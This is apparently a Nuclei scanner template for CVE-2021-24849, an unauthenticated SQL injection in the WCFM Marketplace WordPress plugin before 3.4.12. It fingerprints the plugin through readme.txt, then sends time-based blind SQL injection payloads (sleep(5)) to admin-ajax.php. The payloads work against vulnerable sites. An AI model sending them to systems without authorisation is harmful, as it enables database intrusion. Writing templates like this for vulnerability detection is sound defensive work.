id: CVE-2021-24849 info: name: WCFM WooCommerce Multivendor Marketplace < 3.4.12 - SQL Injection author: ritikchaddha severity: critical description: | The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections. remediation: Fixed in 3.4.12 reference: - https://wpscan.com/vulnerability/763c08a0-4b2b-4487-b91c-be6cc2b9322e/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24849 - https://wordpress.org/plugins/wc-multivendor-marketplace/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-24849 cwe-id: CWE-89 epss-score: 0.02367 epss-percentile: 0.89609 cpe: cpe:2.3:a:wclovers:frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 3 vendor: wclovers product: "frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible" framework: wordpress publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace" tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,sqli,wclovers flow: http(1) && http(2) http: - raw: - | GET /wp-content/plugins/wc-multivendor-marketplace/readme.txt HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - status_code == 200 - contains(body, "WCFM Marketplace - Best Multivendor Marketplace for WooCommerce") condition: and internal: true - raw: - | @timeout: 20s POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded {{post_data}} payloads: post_data: - "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1+union+select+1+and+sleep(5)--" - "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1&orderby=ID`%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)--%20`" stop-at-first-match: true matchers: - type: dsl dsl: - 'duration>=5' - 'status_code == 200' - 'contains(header, "application/json")' - 'contains(body, "success")' condition: and # digest: 4b0a00483046022100ade9023a98f1e582ced87da228df4387a9351ee1bc7d0f80b959b1c01efe9301022100a724a4b3f7b0d2716fa368d0014ba7c027ba80d657109e06ec9571050764a3e9:922c64590222798bb761d5b6d8e72950